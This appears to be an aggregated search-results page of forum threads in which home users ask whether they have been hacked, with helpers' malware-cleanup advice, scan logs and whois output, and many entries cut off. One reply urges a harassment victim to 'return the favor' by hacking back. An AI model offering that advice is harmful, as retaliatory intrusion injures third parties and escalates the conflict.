Internet ServicesWindows FirewallSystem RestoreSecurity Center/Action CenterWindows UpdateWindows DefenderOther ServicesPress "Scan".It will create a log (FSS.txt) in the same directory the tool is run.Please copy and paste the log to your reply. Please download MiniToolBox and run it.Checkmark following boxes:Report IE Proxy SettingsReport FF Proxy SettingsList content of HostsList IP configurationList Winsock EntriesList last 10 Event Viewer logList Installed ProgramsList Devices (do NOT change any settings here)List Users, Partitions and Memory sizeList Restore PointsClick Go and post the result. Please download Malwarebytes Anti-Malware (MBAM) to your desktop.NOTE. If you already have MBAM 2.0 installed scroll down.Double-click ... Read more

more replies
Relevance 58.22%

I'll get right down to it,

I used to be friends with this IT guy who's very good with computers. Fairly certain he's going to school for computer engineering (if that matters) Anyways, the long and short of it is that we had a falling out.

Personally, I wanted to settle the disagreement face to face (we live within close proximity) but he wishes to sit behind his computer and "confront" me his way. He's already attempted to "hack" some of my things (accounts and what not) however I was looking for some opinions as to what steps I should take here.

What I obviously want to do is show up and lay a beat down but knowing him, he'd call the cops on me lol, so despite my desire for revenge and will to see him suffer physically I'll have to resort to the non-violent approach and just protect myself internally.

I was thinking that obviously I should change my IP address, however I would assume that even if I could change it it wouldn't change very much (as in numerically) . I know I've called Rogers Communications to change my IP address before and they told me they weren't able to do so... I'm also using limited firewall protection atm and I believe my father even removed our wireless security recently (we live in the country, yes I know stupid...)


So I'm just wondering what else I should do here. B/c I know it's only a matter of time before he attempts to hijack something else.

Tha... Read more

Answer:what if you KNOW you're going to be hacked...

I'd say let it happen and return the favor... call the cops after he's done it but be damned sure you have solid proof you've been compromised
 

28 more replies
Relevance 58.22%

Hi

Just a small thing I noticed. On my home pc, whenever I open my yahoo mail, the first time I enter my user name and password it says the password is incorrect. The seond time it works.

It always says my password is wrong the first time I try logging onto yahoo mail from the web. Just a bug? Or some key logging software?

I have win xp pro.

Any suggestions?

Here is a hijackthis log:

Logfile of HijackThis v1.97.7
Scan saved at 19:44:51, on 29/02/2004
Platform: Windows XP SP1 (WinNT 5.01.2600)
MSIE: Internet Explorer v6.00 SP1 (6.00.2800.1106)

Running processes:
C:\WINDOWS\System32\smss.exe
C:\WINDOWS\system32\winlogon.exe
C:\WINDOWS\system32\services.exe
C:\WINDOWS\system32\lsass.exe
C:\WINDOWS\System32\Ati2evxx.exe
C:\WINDOWS\system32\svchost.exe
C:\WINDOWS\System32\svchost.exe
C:\WINDOWS\system32\spoolsv.exe
C:\Program Files\NavNT\defwatch.exe
C:\Program Files\NavNT\rtvscan.exe
C:\WINDOWS\System32\svchost.exe
C:\WINDOWS\System32\MsgSys.EXE
C:\WINDOWS\Explorer.EXE
C:\Program Files\NavNT\vptray.exe
C:\WINDOWS\System32\DSentry.exe
C:\Program Files\Adaptec\Easy CD Creator 5\DirectCD\DirectCD.exe
C:\WINDOWS\System32\atiptaxx.exe
C:\Program Files\Winamp\winampa.exe
C:\WINDOWS\System32\tbctray.exe
C:\Program Files\MSN Messenger\MsnMsgr.Exe
C:\WINDOWS\System32\ctfmon.exe
C:\Program Files\FinePixViewer\QuickDCF.exe
C:\Program Files\mIRC\mirc.exe
C:\Program Files\Internet Explorer\iexplore.exe
C:\Program Files\Internet Explorer\iexplore.exe
C:\Documents and Settings\Jarmila\D... Read more

Answer:Have I been hacked?

8 more replies
Relevance 58.22%
Question: Hacked?

Hi. What does it mean when My Entire Address Book Received Spam from my E-mail Address? I (obviously) did not send these 2 separate e-mails containing Spam (Canadian pharmacy, etc), but it appears that EVERYBODY in my contacts/address book was sent them from my AOL e-mail address that i've had for about a decade now.So, my question's are: 1) WHY/HOW DID THIS HAPPENED?2) WHAT SHOULD I DO NOW?I would like to THANK YOU in advance for any info, advice, suggestions etc that may help me to understand what/why this happened, and what I should do next. EDIT: Moved from XP to Am I Infected forum ~ Hamluis.

Answer:Hacked?

Thank you, hamluis, for the edit
Now I understand a bit more how to post on here in order to get the most out of this.
Thanks again!

6 more replies
Relevance 58.22%

I have windows xp pro and I have been hacked into. Symantec say's I need to format and reinstall xp. They said it is a Backdoor trojan. I have copied all my things I want to save but don't know how i should format.Please help. I'm not to savvy with the computer so I need info in layman terms. Thanks for any help you can provide


fasteddie9273

Answer:I've been hacked. Help please

Quote:




Originally posted by fasteddie9273
I have windows xp pro and I have been hacked into. Symantec say's I need to format and reinstall xp. They said it is a Backdoor trojan. I have copied all my things I want to save but don't know how i should format.Please help. I'm not to savvy with the computer so I need info in layman terms. Thanks for any help you can provide


fasteddie9273




First off, this post doesn't belong in the "Site Feedback & Suggestions" forum

Thread moved vile!

You don't have to format to remove a backdor trojan, but anyway..

You said you copied all the things you want to save..Does this mean they are backed up already?

If you *know* what you want to save, just burn the files, so you can restore them later, after the install. If they are too big to burn, or you dont' want to do that, I recommend downloading Parition Magic (or use XPs Disk Managmeent features) to create a new parition, and then put your backup/data on this new parition. That way when you format your main parition (C:\) you won't loose your data.

The easiest way to reinstall/format, is to go into BIOS, change your boot sequence to CD first, then boot with the XP cd, and it will give you the option to format the parition before installing. I recommend doing it this way. Once the XP setup formats, it will install XP, and you're all set.

6 more replies
Relevance 58.22%
Question: Been Hacked

Hello. I was hacked the other night. I have basically lost control of my computor. I think I have stopped information from going out but I have lost the ability to send email. Any java sites dont work. I cant remove or add programs, my printer was uninstalled. just to name a few things.

I am running win2k pro I had all the latest patches and Outlook express 6 with patches.

I dont know where to start or what to do? Any thoughts or comments would help please!

oh and i cant access my floppy or cd rw or drive. so this guy did one hell of job on me. I found some logs that looks like he had a program that scanned the registry and changed it......but I am not sure. Please guide me in the right direction.

P.S also running Zone Alarm Pro and Norton Anti Virus
Amd 1800 Sanyo Dragon Lite 256 mem.

Thanks for your help in advance!!

Answer:Been Hacked

Sorry to here about that.I think the best thing to do is reformat and reinstall everthing.I know its a hassle but it will be best.Trying to fix it will only frustrate you more than a reinstall.
Also ifyou dont do a reformat you might risk still having something left over from whoever hacked you.Then get a little more protection.And make sure and setup zone alarm up more aggresively.After you get your computer go to
http://grc.com/x/IPAgentDiscontinued.htm and run the tests to see if your computer is safe.Good Luck
Pat S.

6 more replies
Relevance 58.22%

ok well i was on aim and these guys say that they were using my screen name, and they deleted like folders that were on my desktop and i dont know what to do someone please help
 

More replies
Relevance 58.22%

I minimized my screen and saw four pages of a <!doctype html> on my screen that I didnt type. I printed it before it disappeared off my screen. Attached is the first page scanned, there are three other pages but it seems they are trying to hack any account I might have on my computer. Please help!

I have Win 7 on HP Pavillion Slimline computer.
 

Answer:Have i been hacked?

6 more replies
Relevance 58.22%

Cant get in i have my info of my lap top [personal information removed] UUID NUMBER 35434433-3130-3551-5854-7446A07A837F product configuration Id 0883110000385910000620100 system board CT number PDJBH018J4F54W

More replies
Relevance 58.22%

I have a Linksys WRT54G that has Mac Filtering and WPA2 Personal enabled, at the moment only 2 Physical computers, and 2 VMs are connected to it but when I went to my Linksys Router's DHCP Client list there's another computer listed that's not mine. I can't ping it though and the IP lease is about to expire in 14 hours which means it was connected at one point. Any idea how this could happen?
 

Answer:Did I just get hacked?

OUCH said:



With Mac Filtering on. Does the filtering happen before or after an IP has been issued? Is it possible to get an IP, but have Limited Connectivity on a Network that has Mac Filtering on?Click to expand...

I am pretty sure it happens before an IP is assigned. I have a WRT54g as well and without a MAC address in the filter list, it should not hand out IPs to wireless clients.
 

6 more replies
Relevance 58.22%

Hi Guys, I'm back again... So I have two issues. One is: I get emails with my son's email address but it's just a link. Now he may be using a phone to send them. The thing is, I never open any of them because, well, I just don't open suspicious mail, not even from my two men. But tonight I deleted four of these emails and when I checked my deleted box. only one of the pieces of mail was there. The one piece I know my son sent. Am I being hacked or something?Issue two: I think I need to upgrade from IE7 to at least IE8, the thing is, you all know how squimish I am about downloading things. So, if I click on the download button for IE8, will I have to do anything else, or should I get a Microsoft Tech to help me? Oh, I never tried again to do the HJT so that you guys could look at my programs and stuff. Thanks Guys.Thanks guys.

Answer:Am I being hacked or something?

Thanks for redirecting the topic Allan. I'm trying to think if I left out any info. I also had a couple of emails from my other son who denies sending me the same type of email. Just a link. My sons usually greet me and stuff, and so this type of mail with their address sent up flags. Is someone reading my outgoing mail, then using the addresses to damage my girl here.?About Twitter... they are always doing something in there. Right now they have what's called THE NEW TWITTER. So I click it to be in the new Twitter, but when I leave Twitter, the next time I go there I'm right back in the old Twitter. They post help info about upgrading your browser if you have certain problems. So, I'm trying to do that. But I don't want the hassle of download problems.

3 more replies
Relevance 58.22%
Question: iVE BEEN HACKED

I was using my I pad and a pop up appeared saying that I have been hacked. There is a phone # and I phoned but was not comfortable speaking to them  so tried cqalling microsoft support ansd everytime i got through, i immediately got cut off.  What
is happening

More replies
Relevance 58.22%
Question: Am I hacked?

I have a Dell Inspiron e1505 laptop. First, I have to say the battery is completely dead just in case that has anything to do with anything. I was just on this last night and all was fine; I go to get on today and it's claiming no connectivity. This has done this before so, I'd run the repair and no problems. This time it's claiming I have an unrecognizable ip address which is now showing all zeros when I run repair. The hourglass is constantly flickering and on as though something is running but nothing is due to no Internet. I am on my daughter's iPad right now.
 

More replies
Relevance 58.22%
Question: Hacked via RDP

I have a pretty serious issue that is calling my integrity into question. An email was sent from one of my accounts that I did not send. It could have only happened one of two ways either someone physically did it from my computer or from my computer via RDP. Upon finding out about the situation I immediately started investigating possibilities as actual access to my computer physically would be rather difficult but not entirely impossible. What I found was that someone could have accessed my computer via RPD and that is highly likely as I started digging into my computer and found that I indeed had permissions on for this and there was at least two applications that could accomplish this running or open whatever you call it. I immediately disabled all of this and turned the permissions off but kind of like closing the barn door after the horse is out. My computer is usually up and running and logged in to everything, including my email accounts 24 hours a day 5 days a week as well. If someone used rdp to access my computer and acted maliciously sending emails and using other programs on my computer is there anyway to tell that it was them who sent them or would it simply look as if I did it. This could even result in some minor criminal charges if I can't prove this happened. One IT expert told me that they would be able to detect through the email that someone was using my computer remotely when those emails were sent. I'm not buying it. I feel they are just trying to make ... Read more

Answer:Hacked via RDP

Why do you think RDP has anything to do with the issue? Just because the service was enabled? I think it is enabled by default, but that doesn't mean it's being used. Isn't it more likely someone got access to the password to one of your email account and sent it via web or SMTP? Was it tracked to your IP? Need more data.

5 more replies
Relevance 58.22%

I tried to sign on to my bank's online banking website, and a page came up asking for my credit card information and ATM PIN. I immediately called the bank to find out if it was legitimate. It is not. The customer service guy talked to the IT guy, and they figured there was no problem with their system, so there must be a problem with mine.

I'm using Windows XP, and I ran a Malwarebytes Anti-Malware scan that didn't find anything wrong.

I can't provide the exact message because after I copied the text, my computer crashed and now the message isn't coming back.

Any help in this matter would be greatly appreciated.

Answer:I think I'm being hacked

I tried to sign on to my bank's online banking websiteWhere did you get the link for logging into your bank? What you describe is usually attributed to "Phishing". That technique is an Internet scam used to gain personal information that uses spoofed e-mail addresses and fraudulent Web sites to masquerade as legitimate business sites. The fake sites are designed to fool respondents into entering personal financial data such as credit card numbers, account user names, and passwords, which can then be used for financial theft or identity theft. The e-mail directs the user to visit a Web site where they are asked to update personal information, such as passwords and credit card, social security, and bank account numbers, that the legitimate organization already has. The Web site, however, is bogus and set up only to steal the user?s information but it may also contain malicious code which can spread infection.

12 more replies
Relevance 58.22%
Question: I've been hacked

Long story short here is what happened and what I did. I awoke at about 4:30am to my laptop running but when I got over to it, it went to sleep. I checked last wake which was at 3:36am. I checked to make sure I didn't have any update permissions which I did not. My computer is set to need my permission for any update. I checked the last update ran and it was when I did it myself the previous day. My sleep settings as always were set to 5 minutes. I then checked the process history and verified my computer was logged into and that the search process was utilized. I did not have a TCP viewer downloaded but upon downloading one I do not think that they left a backdoor. My investigation has stalled here. I have purposefully stopped using that computer just incase there is a ip address in some history somewhere. So my question is can I find a history of ip addresses so that I can check that time and find the culprit. 

Answer:I've been hacked

"I have purposefully stopped using that computer just incase there is a ip address in some history somewhere. "
Can you explain this? IP address in history?
 
"So my question is can I find a history of ip addresses so that I can check that time and find the culprit. "
 
Do you know what method was supposedly used to access your computer? If RDP, check those logs. 

5 more replies
Relevance 58.22%

I was on TS the other day and I got kicked from a channel and automatically joined the "AFK Zone"
I know that you can get Ips from people joining the channel that you are in.... And there was a person in that channel known for hacking... I have ran about 10 Full scans through Windows Defender today, Finding these Files:
HackTool:Win32/KeyGen
HackTool:Win32/Skimod
Trojan:JS/Redirector.OY

-

All of these have been removed but I am still paranoid there is someone hacking me....
Here are my specs:
Tech Support Guy System Info Utility version 1.0.0.2
OS Version: Microsoft Windows 10 Home, 64 bit
Processor: Intel(R) Core(TM) i3-4012Y CPU @ 1.50GHz, Intel64 Family 6 Model 69 Stepping 1
Processor Count: 4
RAM: 3988 Mb
Graphics Card: Intel(R) HD Graphics Family, 1024 Mb
Hard Drives: C: Total - 434423 MB, Free - 310235 MB; D: Total - 25599 MB, Free - 23568 MB;
Motherboard: LENOVO, VIUU4
Antivirus: Windows Defender, Disabled
 

Answer:I think I have been hacked.....

Hello NubStep and welcome to TSG,

My screen name is kevinf80, i`m here to help clean up your system. Make sure to run all scans from accounts with Administrator status, continue as follows please:

Change the download folder setting in the default Browser so all tools we may use are saved to the Desktop:

Google Chrome - Click the "Customize and control Google Chrome" button in the upper right-corner of the browser.
Choose Settings. at the bottom of the screen click the
"Show advanced settings..." link. Scroll down to find the Downloads section and click the Change... button. Select your desktop and click OK.

Mozilla Firefox - Click the "Open Menu" button in the upper right-corner of the browser. Choose Options. In the downloads section, click the Browse button, click on the Desktop folder and the click the "Select Folder" button. Click OK to get out of the Options menu.

Internet Explorer - Click the Tools menu in the upper right-corner of the browser. Select View downloads. Select the Options link in the lower left of the window. Click Browse and select the Desktop and then choose the Select Folder button. Click OK to get out of the download options screen and then click Close to get out of the View Downloads screen.
NOTE: IE8 Does not support changing download locations in this manner. You will need to download the tool(s) to the default folder, usually Downloads, then copy them to the desktop.

Change default download folder... Read more

1 more replies
Relevance 58.22%
Question: Being hacked!

Every hour or so I get a message from norton internet security saying that someone is attacking my using portscan from the following ip 71.250.0.12 Could anyone here tell me where this attack is coming from. I am not using any programs other than internet explorer at the time. I have a belkin wireless router that I get the internet from. There is only 1 other computer that is also connected that is mine that isnt running. Any help would be appreciated.
 

Answer:Being hacked!

OrgName: Verizon Internet Services Inc.
OrgID: VRIS
Address: 1880 Campus Commons Dr
City: Reston
StateProv: VA
PostalCode: 20191
Country: US

NetRange: 71.240.0.0 - 71.255.255.255
CIDR: 71.240.0.0/12
NetName: VIS-BLOCK
NetHandle: NET-71-240-0-0-1
Parent: NET-71-0-0-0-0
NetType: Direct Allocation
NameServer: NS1.BELLATLANTIC.NET
NameServer: NS2.BELLATLANTIC.NET
NameServer: NS2.VERIZON.NET
NameServer: NS4.VERIZON.NET
Comment:
RegDate: 2004-11-09
Updated: 2005-06-01

OrgAbuseHandle: VISAB-ARIN
OrgAbuseName: VIS Abuse
OrgAbusePhone: +1-214-513-6711
OrgAbuseEmail: [email protected]

OrgTechHandle: ZV20-ARIN
OrgTechName: Verizon Internet Services
OrgTechPhone: +1-703-295-4583
OrgTechEmail: [email protected]

# ARIN WHOIS database, last updated 2005-12-29 19:10
# Enter ? for additional hints on searching ARIN's WHOIS database.
 

32 more replies
Relevance 58.22%

what scans have u done? what protections do you have? when did this start happening?? did you do the scans in safe mode with system restore offspybot adawareavg anti-spywareand ur AV scanCcleanerunlovedwarrior

More replies
Relevance 58.22%

First let me say I am a beginner when it comes to the technical part of computers and the internet, but I think I have been hacked and dont know how to go about fixing it and making it stop. I followed the instructions but could not download any of the programs. I received a download error for Hijackthis and for the other ones a window pops up and says "the parameter is incorrect". Things have been changing on my computer ie. shortcuts to desktop that I didn't put there, small things changing on social media sites, etc. Both my wifes and I cell phones are also not acting right. New apps installed on phones we can't uninstall, etc. And even my DVR is being switched to record other shows than the ones I pick. I am hoping someone can point me in the right direction. Thank you for your time and help in this matter.
 

Answer:Need Help.. Been Hacked??

6 more replies
Relevance 58.22%
Question: Hacked

I swore that I was too smart for this to happen but I responded to a supposed Microsoft Hotmail email saying that I had to give certain information or hotmail would shut down. Of course, I checked it out with Microsoft before I filled in the info and it all looked bona fide. However, I am unable to access email, and friends have been getting emails from me with dire circumstances which require that they send money to Spain where I am supposedly starving and passportless. Jeez! If anyone can help me out of this, I have another email address which is **edited out**. The 'c' might be capitalized. Thanks for any help or condolences.
 

Answer:Hacked

Email Spoofing

Email Spoofing

How do Spammers Harvest Email Addresses

Seems like you volunteered to receive spam?

You can't do much about it, at least not with the actual account. The following links are to give you all the facts about email spoofing and how it is achieved, along with advice on how to avoid it, or at least limit it.
 

3 more replies
Relevance 58.22%
Question: Hacked?

When I play call of duty it says that my keycode is aready is use! Its a legal copy! I didnt give the code to anyone!Also, AIM comes up every once and awhile saying that my account is signed on from 2 locations!! I dont know how! I never gave anyone my password!!What should do??!!??

More replies
Relevance 58.22%
Question: Hacked, need help

I was hacked about an hour ago and the hacker chatted with me, he was quite nice yet can't ignore the fact he said he'll keep going and won't stop till my net is down. I've already changed my IP, my pass in every active website I use, and backed up the important files I have. Currently going through a full scan using Avast, after that going to restore the system to an earlier date. I'm still pretty sure that he's able to access my computer and I require help. Also, he said the chatbox he used was something called Metasplit, or similar to that.

Netstat log:

Active Connections

Proto Local Address Foreign Address State
TCP 0.0.0.0:80 0.0.0.0:0 LISTENING
TCP 0.0.0.0:135 0.0.0.0:0 LISTENING
TCP 0.0.0.0:445 0.0.0.0:0 LISTENING
TCP 0.0.0.0:554 0.0.0.0:0 LISTENING
TCP 0.0.0.0:2869 0.0.0.0:0 LISTENING
TCP 0.0.0.0:5357 0.0.0.0:0 LISTENING
TCP 0.0.0.0:7509 0.0.0.0:0 LISTENING
TCP 0.0.0.0:10243 0.0.0.0:0 LISTENING
TCP 0.0.0.0:49152 0.0.0.0:0 LISTENING
TCP 0.0.0.0:49153 0.0.0.0:0 LISTENING
TCP 0.0.0.0:49154 0.0.0.0:0 LISTENING
TCP 0.0.0.0:49157 0.0.0.0:0 LISTENING
TCP 0.0.0.0:49159 0.0.0.0:0 LISTENING
TCP 10.0.0.1:139 0.0.0.0:0 LISTENING
TCP 10.0.0.1:50488 173.194.70.125:443 ESTABLISHED
TCP 10.0.0.1:50611 77.234.43.51:80 ESTABLISHED
TCP 10.0.0.1:52449 81.218.31.177:80 ESTABLISHED
TCP 10.0.0.1:52974 81.218.31.161:80 ESTABLISHED
TCP 10.0.0.1:52975 81.218.31.144:80 ESTABLISHED
TCP 10.0.0.1:52978 81.218.31.161:80 ESTABLISHED
TCP 10.0.0.1:52979 81.218.31.144:80... Read more

More replies
Relevance 58.22%
Question: am i being hacked?

i notie a wierd icon by my taskbar and i cant click it or close it and when i put my mouse over i see this

and then my avast antivirus pops up this message which is kinda wierd cause it has the same address as the text when i hover that taskbar item, but it says something about utorrent?

i closed utorrent and the icon is still by my clock and that message comes up from avast like every 5 min.

whats going on?
 

Answer:am i being hacked?

drunknbass said:



i closed utorrent and the icon is still by my clockClick to expand...

Did you close utorrent or did you exit the program? Yes there is a difference.
 

18 more replies
Relevance 58.22%

Ive got a situation going on either in my computer or msn hotmail.  All my emails  that I have sent to people in the last mouth r being sent to a friend of mine. It seems someone is spying on me.  But how is this done? I have scanned my pc with Norton 2007 and spybot and both programs have found nothing. Is there anything I can do to stop this? Is it just my 1 msn thats been comprimised? If I make a new msn do these people see everything I do too? Are they in my pc or just msn? I dont no how they r doing this and i really dont want to no I just want to feel safe.PS I checked my windows firewall they r on.

Answer:MSN Hacked? PLz Help

Go to This section, and make a new topic (just copy and paste what you have said here, They'll have a look at your HJT log, First you just go and post the topic there till I' tell you what more you can do untill Broni or Evilfantasy come.Its gonna be just fine

4 more replies
Relevance 58.22%

So my parents fell for one of those scams where an individual calls, pretends to be from Microsoft and "needs to update your computer". He got their cc information but also was able to do something to their computer. I told them to disconnect it from the Internet but I'm not quite sure what to do to make sure it is safe to use.

I tried to figure out exactly what happened but it seems like they somehow granted him remote access to the computer and this guy seems to have installed something. If needed, i think I might just run a clean reformat but I want to make sure I don't bring over any corrupted files, etc. I would prefer to just clean the computer but I'm not sure what I should run to scan it, what I should look for and how to tell if it's safe to use.

Any advice would be helpful, thanks so much!

Edit: computer is windows xp.
 

Answer:Hacked-What to look for?!

11 more replies
Relevance 58.22%
Question: I have been hacked

I woke up this morning to someone controlling my computer! They turned off my volume, minimized my screen, and started scrolling through on my YouTube that i had pulled up. What do I do and how do I prevent this from happening again?

More replies
Relevance 58.22%
Question: Am I being hacked?

Hi I hope you can finaly solve my problem. So it all started with my little sister's Stardoll account. She gave someone her pass and all of her account's information. As expected the other girl changed the pass to take the account. I was quick and managed to contact the site and get her account back but now things keep hapening.
I was on my laptop and suddenly a program called LogMeIn took over my computer. I knew what it was and I struggled a bit but in the end I uninstalled it. My family is totaly clueless on how it got there and I believe them cause they dont really know much about computers anyway.Is it possible for someone to install it from afar?
So then my sisters account got hacked again by a group of girls calling themselves "Gurzsec". Every single time we changed the pass they kept finding it again. I ended up changing it everyday but still they managed to get to it. So I changed the account's email to mine hoping it would be safe. But they contacted me and said they were now tracing all my accounts and closing them. They managed to find and delete my Tumblr account and now I fear for my emails.
I did a complete system scan on all household computers. Nothing at all. Only in the chest was a deactivated Trojan with the name Logmein. I deleted that.

Now Im confused. Do they have my IP address? I checked the system for any other spy programs but found none.
Thanks and I hope u will help!
 

More replies
Relevance 58.22%

I've been hacked. Files uploads no longer work. Can't get display of files & folders. Scroll as in Yahoo news display also disabled. Adrive - cant get file/folder list. Youtube & tv sites - videos can't load.
Hack did delete a executable file. But also suspect registry problem.
Can anyone suggest where to look?
System restored to before problem started.
Deleted & reinstalled Firefox, java, Shockwave, Flash Player
All related Microsoft Fixit run.
Any suggestions much appreciated. Where do I look next?
Thanks in advance.
 

Answer:PC hacked HELP please

9 more replies
Relevance 58.22%
Question: I'm being hacked

I was sharing a couple things I had made to my friends, via posting it on a forum, and it seems some extremely stupid people find it entertaining to ping\DDOS(or whatever people call it now) my servers\me. I was running a webserver(Apache), mySql server, IRC server (UnrealIRCD) and a Flash Media Interactive Server, and while I was at school today I wanted to show my friends something i had made when I noticed I couldn't connect to my website, well I could but it was loading at an extremely slow speed. So now I'm at home and I completely removed my port-forwards, and shutdown my server. Although I am still experiencing a slow connection to the internet. What steps should I take and how can I protect myself a little more?
 

Answer:I'm being hacked

16 more replies
Relevance 58.22%

Hello,

Before explaining my situation, my system information is in my profile, except for this: Antivirus - AVG Internet Security; Internet Connection - 5 Gbps DSL

For the past several weeks, my system has been running very slowly. I have run several complete scans - AVG, ESET, Trend Micro, Spybot Search & Destroy and F-Prot - with nothing more than tracking cookies found. I have cleaned temporary folders using CCleaner, scanned the hard drive for errors and updated all my drivers. Still, the problem persists. I decided to use Process Monitor to see if I could find anything running that was unfamiliar to me. While viewing processes during startup, I noticed regedit that began to run beneath bcmwltry.exe, as if bcmwltry was calling on regedit. I used bcmwltry (a Broadcom utility) to monitor my home wireless LAN (since I have a Broadcom wireless adapter). Because of this activity, even after multiple scans, I decided to simply do a visual scan of files and folders on my C drive to see if I could locate anything unusual. The only thing I noticed was a folder in my Documents and Settings folder called "Misc" which I could not access. This was rather odd because I have folders and files set so that I can view everything. When I checked the properties of the folder, I learned that the folder was owned by S-1-5-21-343818398-573735546-725345543-1003 with inherited security traits from "System." After taking ownership of the folder, I found 3 copies ... Read more

More replies
Relevance 58.22%
Question: Ever Been Hacked?

Title says it all. If so, what happened, how did you know and what did you loose?
 

Answer:Ever Been Hacked?

A number of years ago I was checking the shares in use while online with a modem.
I found a strange user on my D drive share so kicked him and reconnected (got another IP).
I've no idea if he did anything but reformatted the next day just in case and tightened up my security.
 

37 more replies
Relevance 58.22%

Whenever I go to my blog hXXp://ceconn.com/what-smells-so-good, I loads and then the page changes to hXXp://www.associatedcontent.com/article/2...ner.html?cat=49. Also others such as hXXp://www.jokeroo.com/video/viral/samsung...basketball.html. What can I do? I've run my antivirus and Ad-Aware. Nothing helps..EDIT: Broke dangerous links~~Mod boopme

Answer:I've been Hacked, I think

I suggest that no one visit that first link...it sparks several notifications of malware efforts.

Louis

6 more replies
Relevance 58.22%
Question: Hacked at SWI

I couldn't post the FRST scans because my 'access was denied' to the programme, both times i tried to run it.
Ok, where to start? I was trying to help my parents sort out their pc with the help of my laptop, on their wifi.
I ran mbam, frst, eset, etc on mine and their computers.
My laptop was pronounced clean when last checked.
Then swi got hacked a few weeks ago and they lost the thread and went offline until I left to go travelling.
This morning I noticed facebook had 'rdr' tacked on the end of the address and the page looked different. So I closed that. Then an email refused to send 3 times, with yahoo telling me that it was an error which involved me sending mass emails or something, which i hadnt done.
My computer was originally infected with mysearch or mindspark.
On my parents computer, mbam cleared out over 1500 PuPs, including mysearch.
 
 
I won't be logging back into swi forum anymore. They were great helpers but the site seems unsafe at the moment.

Answer:Hacked at SWI

Hello and welcome to the Malware Removal Logs area My name is Alexstrasza and I will assist you with your problem. You can call me Alex Before we begin, there are a few things I want to make sure you know:I am currently in training, so my responses might be delayed. I will generally reply within 48 hours - if this is not possible, I will let you know.Please do not run any tools without being instructed to, as this makes my job much harder in trying to figure out what you have done.Make sure to read my instructions fully before attempting a step.If you have problems or questions with any of the steps, feel free to ask me. I will be happy to answer any questions you have.Please follow the topic by clicking on the Follow this topic button, and make sure a tick is in the receive notifications and is set to Instantly. Any replies should be made in this topic by clicking the Reply to this topic button.Important information in my posts will often be in bold, make sure to take note of these.I will bump a topic after 3 days of no activity, and then will give you another 2 days to reply before a topic is closed. Please inform me if you need more time.Please stay with me until I have confirmed that you are clean. Absence of symptoms does not mean that the computer is clean.Shall we begin then?===I took a look at SpywareInfoForum, it appears that they are clean now. The site should be safe to use.If you cannot use FRST in normal boot, please try this.Farbar Recovery Scan Tool in Recovery... Read more

28 more replies
Relevance 58.22%
Question: I've been hacked!

(Cliffs Below)

Well I'll start off by saying that I really wish I heard about this earlier ( http://www.intelliadmin.com/blog/2006/05/security-flaw-in-realvnc-411.html ). As I was unlucky enough to be running that particular version of VNC on one of my boxes, which is primarily used by my parents. It also just happened to be that the only system I was running with that version of VNC, just happened to be the one I had port fowarding set up on!

I hopped on the system today, after getting complaints of there being new icons in every window. Turned out there were 2 little icons, next to the close/minimize/maximize icons, in every window. I hovered it and it said "minimize to try", thinking hrmm, how did that get there? I maximized the system tray, to reveal both the application responsible for those icons, along with another black/red icon.

Upon clicking on the new mysterious window, a black box came up, with tons of green text running. I know I caught something about apache webserver running in the box, along with other text, however I x'ed it out of surprise and closed the program. I still have no idea what it was, perhaps some application using my system as a node to attack others? The filename was just a 3 letter executable, and google only returned 4 hits, all unreadable asian text.

So now fast foward a few hours of troubleshooting, what could have possibly happened, did a family member install these things by accident? I found in my... Read more

Answer:I've been hacked!

Yeah, you pretty much nailed it...take inventory of sensitive data and the damages, BUT... backup your files to removable media or something and virus-scan before placing them on another HDD or partition. Reformat's a must though, obviously.

You said you already scanned the other LAN computers, but you could try dropping a new AV onto their incase the current one was compromised. And like mentioned earlier, deep scan all the files you plan to keep with an AV. If possible, make a VM and load the CD into that....absolute safest way to avoid further damage.

And you might want into look something like RealVNC, which does 128-bit AES, and if you couple that with a SSH tunnel too, pretty secure.
 

2 more replies
Relevance 58.22%
Question: was I hacked?

Ok, the deal is I am on a wired network (2 computers) with a WEP. My gf is on her computer and all of a sudden her mouse moves, a few programs close out (Firefox). The Display porperties opened like someone right clicked the desktop. At that point I told her just turn off the power. So a few minutes later we restart and everything seems fine. We have norton on it now, with the firewall and antivirus. Also the windows firewall is turned on. I ran the spybot program and found 50 entries. So I cleared all those out now. So I am just wondering if I was hacked and if I should system restore. If it makes any difference right before all this happened a firefox update thing opened up and I clicked restart later. Any help would be great. Thanks.
 

Answer:was I hacked?

Sounds like a stuck key somewhere to me.
 

1 more replies
Relevance 58.22%
Question: I've been Hacked

my msn has been hacked, i used it last nite,no worries now this morning it sayd i have an invalid username/password which is bull coz ive been using the same things for 5 years. it is now locked me and i cant retrieve the password rest thing becoz i cant remember the answer to my secret question...whihc is "my first car" and im sure thats not it becoz im only 16 now, therefore i wud be 11 then :-/

Answer:I've been Hacked

Well, some people might have cars at 11...   lol  Anyway... Do you have any viruses or Spyware in your computer which could have changed your password?[glb]Flame[/glb]

10 more replies
Relevance 58.22%

Hello, I need some advice on whether i was a victim of a hacking process. I recently scanned my computer, and i found one backdoor.bot and 39 trojan.generic. From what i have heard, these are all viruses that grant remote access control to my computer. All of them existed in my computer for almost 2 years. How do i know if someone actually looked into my computer and had actual access to its content? Is there any way?

Answer:Please HELP, how do i know if i was hacked?

Greetings olgapreda1304 and to BleepingComputer's Virus/Trojan/Spyware/Malware Removal forum.My name is Oh My! and I am here to help you! Now that we are "friends" please call me Gary.If you would allow me to call you by your first name I would prefer to do that.===================================================Ground Rules:First, I would like to inform you that most of us here at Bleeping Computer offer our expert assistance out of the goodness of our hearts. Please try to match our commitment to you with your patience toward us. If this was easy we would never have met. Please do not run any tools or take any steps other than those I will provide for you while we work on your computer together. I need to be certain about the state of your computer in order to provide appropriate and effective steps for you to take. Most often "well intentioned" (and usually panic driven!) independent efforts can make things much worse for both of us. If at any point you would prefer to take your own steps please let me know, I will not be offended. I would be happy to focus on the many others who are waiting in line for assistance.Please perform all steps in the order they are listed in each set of instructions. Some steps may be a bit complicated. If things are not clear, be sure to stop and let me know. We need to work on this together with confidence.Please copy and paste all logs into your post unless directed otherwise. Please do not re-run any programs I suggest. If you encounter p... Read more

17 more replies
Relevance 58.22%

